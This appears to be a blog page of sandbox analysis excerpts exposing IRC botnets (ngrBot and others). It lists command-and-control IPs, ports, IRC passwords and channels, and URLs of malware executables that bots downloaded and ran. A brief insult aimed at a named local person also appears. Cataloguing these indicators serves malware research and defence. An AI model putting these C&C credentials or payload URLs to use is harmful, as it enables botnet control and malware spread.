Category: Uncategorized

Remote Host Port Number 149.3.130.4 6667 PASS KCA 178.162.244.239:6667 * The data identified by the following URLs was then requested from the remote web server: o http://api.wipmania.com/ o http://image-facebook.byinter.net/av.txt o http://85.25.152.106/~aydin/beta.exe NICK X{KCA|VNC}44689 USER aaqsf “fo9.net” “rage” :aaqsf JOIN #vnc KCA PONG irc.botnet.net NICK KCA[iRooT-XP-USA]529225 USER 5292 “” “TsGh” :5292 JOIN #botnet KCA PONG :irc.botnet.netRead more...

Remote Host Port Number 174.121.14.164 80 174.36.56.201 80 195.10.192.39 80 195.210.28.38 80 195.250.147.177 80 204.0.5.35 80 204.2.197.201 80 209.17.74.144 80 66.115.184.85 80 66.115.184.87 80 219.67.79.165 4244 PASS google_cache2.tmp PRIVMSG #!N!# :http://kajmak1.bloger.hr Has Been Visited! NICK new[iRooT-XP-USA]947559 USER 1884 “” “TsGh” :1884 JOIN #!N!# WTF PRIVMSG #!N!# :http://marijana1x2.bloger.hr Has Been Visited! hosting infos: http://whois.domaintools.com/219.67.79.165

Resolved : [ngrbot.co.cc] To [95.211.36.82] Resolved : [ngrbot.co.cc] To [93.95.99.87] Remote Host Port Number 199.15.234.7 80 95.211.36.82 6667 PASS ..PASS .. NICK n{US|XPa}jijjgyc USER jijjgyc 0 0 :jijjgyc NICK n{US|XPa}ufwehuw USER ufwehuw 0 0 :ufwehuw chanel #Hack hosting infos: http://whois.domaintools.com/95.211.36.82

Remote Host Port Number 199.15.234.7 80 67.23.236.10 6667 PASS .. NICK n{US|XPa}zvwjerm USER zvwjerm 0 0 :zvwjerm JOIN #ngr ngrBot hosting infos: http://whois.domaintools.com/67.23.236.10

Remote Host Port Number 199.15.234.7 80 72.167.131.225 6667 PASS secret.. NICK n{US|XPa}qdwdanj USER qdwdanj 0 0 :qdwdanj possible chanel #chan hosting infos: http://whois.domaintools.com/72.167.131.225

Remote Host Port Number 199.15.234.7 80 70.85.2.50 80 92.241.165.225 7475 PASS ngrBot NICK n{US|XPa}cgfwoyy USER cgfwoyy 0 0 :cgfwoyy JOIN ##cybercenter## ngrBot JOIN #US PRIVMSG ##cybercenter## :[DNS]: Blocked 0 domain(s) – Redirected 17 domain(s) hosting infos: http://whois.domaintools.com/92.241.165.225

There is a mistake in hosting adress Serbia must be Kosova because this botnet is hosted in Kosova indipendent Nation Here is the scaner used by Lindi a litle idiot from peja: #!/usr/bin/perl $powered="BaMbY"; $mail="admin(at)bamby.web.id"; ##################################################################################### ## ## ## 17/06/2010 ## ## Author : BaMbY, Voo_Doo ## ## Team : Irc.Byroe.Net ## ## ## ##Read more...

Remote Host Port Number 173.45.102.45 5794 PASS ngrBot 199.15.234.7 80 83.169.31.7 80 NICK n{US|XPa}uknudkt USER uknudkt 0 0 :uknudkt JOIN #butowski ngrBot JOIN #US PRIVMSG #butowski :[DNS]: Blocked 0 domain(s) – Redirected 27 domain(s) hosting infos: http://whois.domaintools.com/173.45.102.45

Remote Host Port Number 141.105.66.223 80 199.15.234.7 80 74.86.158.236 80 46.166.137.234 8282 PASS passwd PRIVMSG #dork :[HTTP]: Updated HTTP spread interval to “3” PRIVMSG #dork :[HTTP]: Updated HTTP spread message to “http://facebook-image.info/pic5436457564.jpg” PRIVMSG #dork :[d=”http://quadgroup.in/lol/dl.exe” s=”151552 bytes”] Executed file “C:Documents and SettingsUserNameApplication Data2.exe” – Download retries: 0 PRIVMSG #dork :[d=”http://quadgroup.in/ngg.exe” s=”249856 bytes”] Executed file “C:DocumentsRead more...

Remote Host Port Number 199.15.234.7 80 46.105.241.231 80 50.16.220.121 80 46.105.241.231 6999 PASS PRIVMSG #chan :[d=”http://dl.dropbox.com/s/1ckvkvltoyy73e1/link.exe” s=”56471 bytes”] Executed file “C:Documents and SettingsUserNameApplication Data1.exe” – Download retries: 0 NICK n{US|XPa}pdrybps USER pdrybps 0 0 :pdrybps JOIN #chan ngrBot * The data identified by the following URLs was then requested from the remote web server: oRead more...